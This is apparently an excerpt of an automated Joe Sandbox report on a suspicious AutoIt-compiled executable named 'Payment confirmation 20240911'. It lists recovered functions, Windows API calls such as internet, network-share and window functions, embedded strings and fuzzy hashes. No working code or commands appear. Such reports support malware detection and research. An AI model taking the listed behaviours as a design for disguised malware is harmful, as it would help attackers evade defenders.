                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: >$DEFINE
                                          • API String ID: 4104443479-1664449232
                                          • Opcode ID: 73e1fa01288f047aa865da25ec0b2b184aa5002bf6e56629814f2da732c52028
                                          • Instruction ID: eda5236d0eaa28b3f85acf2711eb55688bfb0c15560108d7711f20c12a57b101
                                          • Opcode Fuzzy Hash: 73e1fa01288f047aa865da25ec0b2b184aa5002bf6e56629814f2da732c52028
                                          • Instruction Fuzzy Hash: CA12AE74A1020ADFCF25CF98C484AADBBB5FF48318F56815AE909AB355D730E985CB90
                                          APIs
                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0131ECA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ContainedObject
                                          • String ID: AutoIt3GUI$Container
                                          • API String ID: 3565006973-3941886329
                                          • Opcode ID: 9589a451114fbabcdd08c0b46b4fe6ac417b85f3e4e8d010256bda8a4a819ee2
                                          • Instruction ID: 679d20aa010939132b042d21a9b26ad7a39a54e321a7f1663e2f06b5654fa63a
                                          • Opcode Fuzzy Hash: 9589a451114fbabcdd08c0b46b4fe6ac417b85f3e4e8d010256bda8a4a819ee2
                                          • Instruction Fuzzy Hash: FE914A74600701EFDB19CF68C884B6ABBF9BF48718F14846DE94ACB694DB71E841CB60
                                          APIs
                                            • Part of subcall function 012E3BCF: _wcscpy.LIBCMT ref: 012E3BF2
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          • __wcsnicmp.LIBCMT ref: 0132E785
                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0132E84E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                          • String ID: LPT
                                          • API String ID: 3222508074-1350329615
                                          • Opcode ID: b6af1c9db1057a85f1cf9bc03c5fb88fb394c1d01ce1dae5599587ae900cef5d
                                          • Instruction ID: 43ab173019ad36c92a56708eb5fd93f367ea83631f322a6813bdf90b58fce288
                                          • Opcode Fuzzy Hash: b6af1c9db1057a85f1cf9bc03c5fb88fb394c1d01ce1dae5599587ae900cef5d
                                          • Instruction Fuzzy Hash: 0E616275A10229AFDF15EF98C895EBEBBF8EF08714F044069E546AB390D770AE40CB50
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 012E1B83
                                          • GlobalMemoryStatusEx.KERNEL32 ref: 012E1B9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: d010c850fdf6379671c6485bdcc322f42be6aaf483b5c352c6878900fd4ef5c9
                                          • Instruction ID: 3c5233d235ecbcafd04ad526da1ca1144ffca3b921452fae041df1f80075af0f
                                          • Opcode Fuzzy Hash: d010c850fdf6379671c6485bdcc322f42be6aaf483b5c352c6878900fd4ef5c9
                                          • Instruction Fuzzy Hash: 6B514871418749EBE320AF14D889BAFBBECFBA9354F41485DF2C8410A5EB71856C8762
                                          APIs
                                            • Part of subcall function 012E417D: __fread_nolock.LIBCMT ref: 012E419B
                                          • _wcscmp.LIBCMT ref: 0132CF49
                                          • _wcscmp.LIBCMT ref: 0132CF5C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          • Opcode ID: dddf769c437261da5ebc9c8f839db3ec26c904e7a6edeb8ef795e230bd5e25db
                                          • Instruction ID: 447a2cbf6a97e60f20d3675ec21439d002e697766db7784ad463b6d7f7e7bd06
                                          • Opcode Fuzzy Hash: dddf769c437261da5ebc9c8f839db3ec26c904e7a6edeb8ef795e230bd5e25db
                                          • Instruction Fuzzy Hash: 6841A632A1025ABADF21EBA4CC84FEF7BB9EF59714F000469E601EB190D771DA448760
                                          APIs
                                          • _memset.LIBCMT ref: 013357E7
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0133581D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CrackInternet_memset
                                          • String ID: |
                                          • API String ID: 1413715105-2343686810
                                          • Opcode ID: 8a84b5092a6bb72a2579a052f047fafdc71ccea28378048c0fbbc6bb1805e523
                                          • Instruction ID: 09c529add7c9fb29bec86e866c0777971451f34675d6b05058725933d99f27a4
                                          • Opcode Fuzzy Hash: 8a84b5092a6bb72a2579a052f047fafdc71ccea28378048c0fbbc6bb1805e523
                                          • Instruction Fuzzy Hash: 09313B7291011AABCF11AFA4CC94EEEBFF8FF28304F104019E815A6161DB319A16CB60
                                          APIs
                                          • DestroyWindow.USER32 ref: 0134961B
                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 01349657
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          • Opcode ID: edcbe7f4aadf616f831b749ac2485f43fd0e6fe5751752eb218b01fae917f925
                                          • Instruction ID: 49caa419b2ee23bebd858eb7ad18557ec2f4c8206b63c82e4d142ea81ba839d9
                                          • Opcode Fuzzy Hash: edcbe7f4aadf616f831b749ac2485f43fd0e6fe5751752eb218b01fae917f925
                                          • Instruction Fuzzy Hash: A4319E31500204AFEB219F68D880FBB77ADFF48768F108519F9A9C7190CA35A891DB60
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          APIs
                                          • __snwprintf.LIBCMT ref: 01336BDD
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          Similarity
                                          • API ID: __snwprintf_memmove
                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                          • API String ID: 3506404897-2584243854
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                            • Part of subcall function 012FB155: GetWindowLongW.USER32(?,000000EB), ref: 012FB166
                                          • GetParent.USER32(?), ref: 0135F4B5
                                          • DefDlgProcW.USER32(?,00000133,?,?,?,?,?,?,?,?,012FADDD,?,?,?,00000006,?), ref: 0135F52F
                                          Similarity
                                          • API ID: LongWindow$ParentProc
                                          • String ID: `"u
                                          • API String ID: 2181805148-810275233
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01349269
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01349274
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          Similarity
                                          • API ID:
                                          • String ID: `"u
                                          • API String ID: 0-810275233
                                          APIs
                                            • Part of subcall function 012FC619: CreateWindowExW.USER32 ref: 012FC657
                                            • Part of subcall function 012FC619: GetStockObject.GDI32(00000011), ref: 012FC66B
                                            • Part of subcall function 012FC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 012FC675
                                          • GetWindowRect.USER32(00000000,?), ref: 01349775
                                          • GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 0134978F
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          Similarity
                                          • API ID: CreateMenuPopup
                                          • String ID: `"u
                                          • API String ID: 3826294624-810275233
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 013494A6
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 013494B5
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          APIs
                                          • SendMessageW.USER32(?,?,?,?), ref: 0134B03B
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: `"u
                                          • API String ID: 3850602802-810275233
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0133544C
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01335475
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          Similarity
                                          • API ID:
                                          • String ID: `"u
                                          • API String ID: 0-810275233
                                          APIs
                                          • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0133ACF5
                                          • htons.WSOCK32(00000000,?,00000000), ref: 0133AD32
                                          Similarity
                                          • API ID: htonsinet_addr
                                          • String ID: 255.255.255.255
                                          • API String ID: 3832099526-2422070025
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0131C5E5
                                          Similarity
                                          • API ID: MessageSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1456604079-1403004172
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 0131C4E1
                                          Similarity
                                          • API ID: MessageSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1456604079-1403004172
                                          • Opcode ID: 30c7fbf7ad0990c69e4788f56cc2d021c378a8b73a80a584f621f8a08a687f32
                                          • Instruction ID: 40f43a6c49eb698c4eda41c8652795e027e496774bcccfc5cf7e0bbfcb5d8767
                                          • Opcode Fuzzy Hash: 30c7fbf7ad0990c69e4788f56cc2d021c378a8b73a80a584f621f8a08a687f32
                                          • Instruction Fuzzy Hash: 450126716910097BDB19EBA8C962EFF33EC9F21608F540429E943F32C4DF149E1983A1
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 0131C562
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1456604079-1403004172
                                          • Opcode ID: c3cac57241a5c251e9116af0e5402f8bbd65f64aefd1da95371f7dce05355a68
                                          • Instruction ID: f5c9b3e3f39b49008d40618d589b11332f4fe3fea07b09acd4ead378d22c98ef
                                          • Opcode Fuzzy Hash: c3cac57241a5c251e9116af0e5402f8bbd65f64aefd1da95371f7dce05355a68
                                          • Instruction Fuzzy Hash: 8D012671A41109BBDB08EBA8C911EFF33EC9F21604F540124E503F3284DA248E099361
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0135F352,?,?,?), ref: 0134F115
                                            • Part of subcall function 012FB155: GetWindowLongW.USER32(?,000000EB), ref: 012FB166
                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0134F0FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageProcSend
                                          • String ID: `"u
                                          • API String ID: 982171247-810275233
                                          • Opcode ID: f77600396aa1874f6efc5e4a65f6ef6ce8c5758cb7340e4c85677f3afdb71ed0
                                          • Instruction ID: c729f3ce94c4491d83744e4364632dbf0e0f214f9c51747a0dc1c2d43faba778
                                          • Opcode Fuzzy Hash: f77600396aa1874f6efc5e4a65f6ef6ce8c5758cb7340e4c85677f3afdb71ed0
                                          • Instruction Fuzzy Hash: 0B018435200214ABDB21AF5DDC48F6A7FAEFB8A368F084558F9560B6E0C771A812DB51
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __calloc_crt
                                          • String ID: 2u
                                          • API String ID: 3494438863-169037360
                                          • Opcode ID: c57597181624c5969335003702d37b090a96d0a03c155b05a2e1263a72fa0b4a
                                          • Instruction ID: f586705e4b1bbac2f98497eef01378dfacfea1ac26d0c7a9b15b4562c262f105
                                          • Opcode Fuzzy Hash: c57597181624c5969335003702d37b090a96d0a03c155b05a2e1263a72fa0b4a
                                          • Instruction Fuzzy Hash: B6F0317121C3125EFB378A5DB8A1B633AE8A744738F44551AE105EB6C9E77098818F98
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp
                                          • String ID: #32770
                                          • API String ID: 2292705959-463685578
                                          • Opcode ID: 7c19b4ed09114e545afeac861fcfa45c8a93fa7fe796fbd14b462f52639a450b
                                          • Instruction ID: aa4ac9160d7644fae93db83ee8acd374d08340548c40065633d075a0c0e9e59d
                                          • Opcode Fuzzy Hash: 7c19b4ed09114e545afeac861fcfa45c8a93fa7fe796fbd14b462f52639a450b
                                          • Instruction Fuzzy Hash: F1E0D83760022927D721EAAAAC49ED7FBACFB51778F000066E954E3141D670954187D0
                                          APIs
                                          • MessageBoxW.USER32 ref: 0131B36B
                                            • Part of subcall function 01302011: _doexit.LIBCMT ref: 0130201B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Message_doexit
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 1993061046-4017498283
                                          • Opcode ID: 2282c7a22433152012ffd04fff91589dda746a22b39a6b65157e3ec2c6c02fc1
                                          • Instruction ID: 9a0d10569b0291b6d988433dfa683dc3f4923c86ea6d8d602f3ab87d5b5eb9e0
                                          • Opcode Fuzzy Hash: 2282c7a22433152012ffd04fff91589dda746a22b39a6b65157e3ec2c6c02fc1
                                          • Instruction Fuzzy Hash: CED0123238531932D61A22DE6C1AFD676C84F15B99F004419FF4C651D5CAD6949042D9
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0135BAB8
                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0135BCAB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: DirectoryFreeLibrarySystem
                                          • String ID: WIN_XPe
                                          • API String ID: 510247158-3257408948
                                          • Opcode ID: ae9a6ec680a4020ebdb270a6de79c48c91c177030f759c1de0e48f8b1e562579
                                          • Instruction ID: 8b54a38dc0cc4dc6f8e696ac60d226d7b95f6fca45c140e38dd34ea9c46eade6
                                          • Opcode Fuzzy Hash: ae9a6ec680a4020ebdb270a6de79c48c91c177030f759c1de0e48f8b1e562579
                                          • Instruction Fuzzy Hash: 9EE03270C1410DEFEBA1DBA8C845AEDFBBDBB08705F00C496E922B2058C7718A00CF21
                                          APIs
                                          • FindWindowW.USER32 ref: 0134849F
                                          • PostMessageW.USER32 ref: 013484B2
                                            • Part of subcall function 01328355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 013283CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 925a89e9742b80f860f8658c19543435639a90d5ce179e4cb04b96d31347c49b
                                          • Instruction ID: 745a1bca0360129d979a0cd82b674fe4e72efb176e309e39cf0e083a9abef489
                                          • Opcode Fuzzy Hash: 925a89e9742b80f860f8658c19543435639a90d5ce179e4cb04b96d31347c49b
                                          • Instruction Fuzzy Hash: 9AD0237334431077D73076709C4FFC36548AF18710F000818F349551D0C4E47800C350
                                          APIs
                                          • FindWindowW.USER32 ref: 013484DF
                                          • PostMessageW.USER32 ref: 013484E6
                                            • Part of subcall function 01328355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 013283CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 08527f9ae379d41b1b55f875c3b06e8080719304e091ad8bad5a484c945a460b
                                          • Instruction ID: 68bbaf655772853b1d5834358fe85f37bf620705253f9ed9bf9256e6e53a65e8
                                          • Opcode Fuzzy Hash: 08527f9ae379d41b1b55f875c3b06e8080719304e091ad8bad5a484c945a460b
                                          • Instruction Fuzzy Hash: ACD022733843107BEB31B6B09C4FFC36648AB2CB20F000828F389AA2D0C8E4B800C364